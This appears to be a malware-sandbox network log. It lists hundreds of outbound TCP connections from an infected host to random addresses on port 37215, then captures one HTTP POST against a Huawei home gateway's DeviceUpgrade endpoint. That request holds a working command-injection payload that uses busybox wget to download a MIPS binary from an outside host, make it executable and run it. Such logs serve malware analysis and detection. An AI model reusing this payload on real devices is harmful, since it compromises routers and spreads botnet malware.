Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.226.227.76:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.201.249.137:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 129.20.51.31:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 220.37.210.211:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.106.159.189:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.45.30.188:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.81.100.171:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 78.79.92.103:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.14.160.128:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 208.235.87.164:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.133.164.62:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.115.83.1:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.127.153.62:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.12.55.154:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.8.249.75:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.15.241.22:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.167.177.140:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.102.217.16:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.216.93.130:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.179.255.245:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.8.178.65:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.32.100.111:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 51.4.163.62:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.245.38.11:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.85.248.239:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 109.150.132.73:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 9.204.150.190:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.211.118.96:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.30.241.177:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.47.247.93:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 48.23.116.228:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 17.95.14.169:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 189.229.207.112:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.225.58.194:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.43.19.163:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.144.169.105:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.126.222.53:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 180.99.137.179:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.47.184.205:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.83.152.64:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.131.55.183:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.104.218.235:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.187.189.205:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.64.186.131:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 101.18.102.175:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.237.247.162:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.110.31.154:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.90.82.183:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.10.82.91:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.170.77.107:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.48.124.127:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 180.247.10.170:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 70.246.244.74:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.197.201.231:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.41.18.63:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.186.108.3:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.33.87.207:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.230.223.161:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.77.225.23:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.78.24.140:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.12.186.168:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.190.64.144:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.98.8.119:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.128.226.73:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.187.127.110:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.140.16.215:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.99.251.117:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 222.143.198.36:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 24.196.190.157:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 64.159.26.98:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.119.75.10:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.41.87.26:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 5.34.233.136:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.72.171.81:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.122.167.67:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.83.45.100:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.185.17.206:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.49.250.176:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.121.54.129:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 130.90.117.214:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.179.204.189:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 209.78.250.46:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.93.139.113:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.124.171.99:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.144.156.22:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.216.122.144:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.36.108.163:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.106.139.114:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 202.47.165.60:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 81.221.127.167:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.42.129.105:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.190.12.134:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.221.216.50:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 18.3.113.160:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.170.247.59:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.18.108.221:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.11.139.12:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.223.141.147:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.171.75.15:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.130.139.163:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.250.98.147:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.127.29.198:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.193.150.206:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.43.251.96:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.176.93.60:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.251.156.194:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.30.234.3:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 176.57.225.147:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.116.14.198:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.193.193.211:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 110.125.68.89:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.249.253.91:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.239.89.252:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 121.149.7.64:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 89.82.155.117:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.51.120.69:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.38.204.127:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.65.49.171:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.21.222.63:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.30.204.11:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.143.103.170:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.138.219.142:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.227.187.70:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.134.42.217:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.234.145.88:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.91.42.74:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 61.207.59.153:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.124.159.174:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.248.33.3:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 116.52.96.35:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 118.239.70.36:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.207.159.198:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.62.212.75:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.207.118.58:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.136.182.8:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.184.252.224:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 103.107.205.206:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.43.204.163:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.32.81.132:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.186.38.211:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.66.77.84:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.206.224.157:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.98.164.254:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 209.250.221.144:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 38.153.238.181:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.245.22.138:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.208.108.23:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 165.14.24.77:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.55.126.175:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.215.22.33:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.140.152.130:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.90.47.75:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.176.91.214:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.160.175.6:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.156.124.24:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.72.17.112:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.174.227.61:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.131.75.51:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 151.243.204.255:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.87.218.35:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 201.56.239.118:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 163.50.246.68:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.254.137.178:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.96.27.126:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 39.230.40.124:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.203.175.23:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 57.66.132.137:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.172.135.138:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.49.79.100:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 135.65.150.114:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.227.131.179:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.98.61.135:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.101.51.82:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.34.138.147:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.19.104.45:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 161.153.181.4:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.179.46.183:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.38.150.197:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.107.183.107:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.20.243.114:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.155.161.202:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 113.202.251.105:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 142.203.126.24:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.84.133.217:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.164.181.243:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.59.31.213:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.132.84.213:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 133.206.46.108:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.228.57.190:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 147.98.189.95:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.193.31.87:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.36.13.131:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.8.220.149:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.10.58.66:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.13.5.37:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.72.35.124:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.160.74.43:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.10.157.32:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.93.81.75:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.143.30.79:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.99.82.0:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 168.99.141.244:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.61.211.126:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.20.152.107:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.179.197.187:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.1.53.173:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.123.158.137:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.181.138.110:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 148.231.112.157:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.26.90.225:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.171.206.114:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.140.191.195:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.125.61.207:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.96.172.72:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 66.96.185.168:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.152.67.197:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.17.101.75:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.227.166.113:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.104.150.99:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.62.33.158:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.160.207.112:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.184.181.252:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 40.158.28.226:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.182.7.228:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.116.30.57:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.11.61.230:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.221.160.190:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.148.218.138:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.92.177.5:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 206.103.152.185:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.52.36.238:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 78.13.123.193:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.69.57.0:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.124.128.156:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 170.230.59.16:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 167.3.206.78:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.180.205.90:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.166.108.179:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.112.55.148:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.210.73.23:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.70.192.127:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.135.112.49:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.193.113.175:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.64.10.227:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.183.1.153:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.169.175.41:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 2.79.205.105:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.75.75.39:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.214.18.79:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 164.30.196.203:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.102.235.35:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 97.222.88.148:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.176.156.36:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.103.48.195:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.64.173.128:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.226.220.221:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.105.154.131:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.137.127.28:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.122.61.176:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.48.192.28:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 57.118.171.76:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.197.117.88:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 97.98.192.103:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 109.10.120.11:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.67.154.127:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 37.28.220.200:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.101.148.213:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 183.110.184.249:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.45.109.125:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.46.128.49:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.184.94.235:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.91.128.245:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.57.112.73:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.114.41.153:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.86.203.191:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 1.254.232.160:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.24.150.199:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 111.45.225.15:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.236.221.92:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 186.133.60.126:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.228.9.131:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.168.116.247:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 90.17.37.174:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.254.249.232:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.149.79.16:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.62.55.175:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.101.86.71:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.135.16.217:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.14.37.245:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 213.58.141.56:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.63.42.164:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 54.61.253.67:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.205.98.121:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.229.254.31:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.18.196.137:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 37.31.74.24:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.251.123.166:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.138.143.131:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.190.201.139:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 81.25.210.213:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.51.204.31:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 223.74.55.57:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.250.52.5:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 84.16.30.15:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.34.114.26:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.212.68.204:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.154.101.240:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.33.25.53:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.42.111.199:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.95.89.142:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.63.182.68:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.129.147.193:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.245.176.122:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.35.72.0:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.97.77.185:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 137.239.129.236:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.203.23.119:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.213.71.156:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.193.126.226:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.243.161.206:37215

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 460Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 37 30 2e 31 34 39 2e 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 72 65 62 69 72 74 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 72 65 62 69 72 74 68 3b 20 2f 74 6d 70 2f 2e 72 65 62 69 72 74 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.70.149.14 -l /tmp/.rebirth -r /mips; /bin/busybox chmod 777 /tmp/.rebirth; /tmp/.rebirth huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
